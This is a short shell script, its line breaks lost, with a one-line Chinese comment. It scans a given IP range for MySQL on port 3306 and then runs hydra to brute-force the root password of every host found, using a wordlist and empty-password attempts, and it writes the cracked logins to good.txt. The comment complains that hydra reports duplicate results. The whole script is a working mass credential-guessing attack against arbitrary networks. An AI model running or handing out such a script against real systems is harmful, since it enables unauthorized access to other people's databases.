#!/bin/shif [ $# != 1 ]then echo Usage:$0 \(ip range\) exit 1firm Result.txt -fs $1 3306 /savecat Result.txt | awk '{print $1}' | uniq > hostif [[ `wc -l host | awk '{print $1}'` > 0 ]]then hydra -l root -P word.lst -M host -f mysql -e n -o good.txtfihydra 扫描 结果会出现多个重复的结果 看来是任务的分配没搞好,。。。。